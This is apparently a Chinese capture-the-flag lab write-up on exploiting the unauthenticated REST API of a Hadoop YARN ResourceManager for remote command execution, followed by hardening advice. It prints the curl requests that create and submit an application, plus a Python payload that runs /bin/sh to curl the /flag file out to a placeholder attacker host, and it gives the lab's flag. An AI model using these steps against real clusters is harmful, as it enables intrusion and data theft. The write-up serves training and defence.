玄机网络安全靶场:Hadoop YARN ResourceManager 未授权 RCE WP

解题报告:Hadoop YARN ResourceManager 未授权 RCE

题目名称 :Hadoop YARN ResourceManager(Unauthorized)
难度 :简单
分类 :渗透
Flagflag{41d1290e-e2d2-4028-85ce-43909a1787c4}


漏洞背景

Hadoop YARN(Yet Another Resource Negotiator)是 Apache Hadoop 的集群资源管理系统。YARN ResourceManager 提供了一套 REST API 用于集群管理,默认情况下该 API 无需任何认证即可访问。攻击者可以通过以下步骤在集群节点上执行任意命令:

  1. 调用 POST /ws/v1/cluster/apps/new-application 创建新的 Application ID
  2. 调用 POST /ws/v1/cluster/apps 提交包含恶意命令的 Application
  3. YARN 的 NodeManager 会在容器中执行该命令

靶机信息

项目
靶机 IP 43.192.45.210
服务端口 8088(YARN ResourceManager Web UI)
服务版本 Hadoop YARN(Jetty 6.1.26)
目标文件 /flag

利用过程

第一步:确认服务连通性

bash 复制代码
curl -v http://43.192.45.210:8088/
# 返回 HTTP 302 → /cluster,确认 YARN 服务正常运行

第二步:获取新 Application ID

bash 复制代码
curl -s -X POST "http://43.192.45.210:8088/ws/v1/cluster/apps/new-application" \
    -H "Content-Type: application/json"
# 返回:{"application-id":"application_1776602744486_0011",...}

第三步:提交恶意 Application

通过 Python 构造 JSON payload,命令使用 /bin/sh -c 执行,将 /flag 内容通过 curl 外带到攻击者服务器:

python 复制代码
command = '/bin/sh -c \'curl -sk "https://ATTACKER/?r=$(cat /flag 2>&1 | tr -d \'\\n\')"\''

payload = {
    "application-id": app_id,
    "application-name": "exploit",
    "am-container-spec": {
        "commands": {"command": command}
    },
    "application-type": "YARN",
    "unmanaged-AM": False,
    "max-app-attempts": 1,
    "resource": {"memory": 1024, "vCores": 1},
    ...
}

第四步:接收外带数据

在攻击者服务器上启动 HTTP 服务,收到请求:

复制代码
GET /flag1?r=flag41d1290e-e2d2-4028-85ce-43909a1787c4 HTTP/1.1

Flag: flag{41d1290e-e2d2-4028-85ce-43909a1787c4}


关键技术点

技术点 说明
无认证 REST API YARN ResourceManager 默认不需要认证
Application 提交 通过 REST API 提交包含任意命令的 Application
命令执行环境 NodeManager 容器中以 hadoop 用户执行
外带方式 靶机可以访问外网,用 curl 将结果发送到攻击者服务器
base64 问题 靶机环境 base64 -w 0 不支持,改用 tr -d '\n' 去除换行

修复建议

  1. 为 YARN ResourceManager REST API 启用 Kerberos 认证
  2. 配置防火墙,限制 8088 端口只允许内网访问
  3. 启用 YARN 的 ACL(Access Control List)功能
  4. 升级到支持认证的 Hadoop 版本并正确配置安全模式

相关推荐
吴声子夜歌13 分钟前
SQL经典实例——使用多张表
数据库·sql
倔强的石头_1 小时前
《Kingbase护城河》——深度解密数据库行锁冲突与等待事件架构
数据库
IT策士1 小时前
Redis 从入门到精通:性能调优与多语言客户端对比
数据库·redis·缓存
青柠代码录2 小时前
【Redis】数据类型:Stream
redis
Bert.Cai2 小时前
Oracle INSTR函数详解
数据库·oracle
AC赳赳老秦3 小时前
OpenClaw+Power Apps 实战:自动生成 Power Apps 应用、连接 Excel 数据源
大数据·开发语言·python·serverless·excel·deepseek·openclaw
Yeats_Liao3 小时前
Feed流系统设计(三):数据模型与存储设计,从表结构到Redis收件箱
java·javascript·redis
JiaHao汤3 小时前
分布式事务方案全景:从理论到 Seata 落地
java·分布式·spring·spring cloud
keke.shengfengpolang3 小时前
数据科学与大数据技术和大数据管理与应用怎么抉择?
大数据
茉莉玫瑰花茶4 小时前
综合案例 - AI 智能租房助手 [ 5 ]
服务器·数据库·人工智能·python·ai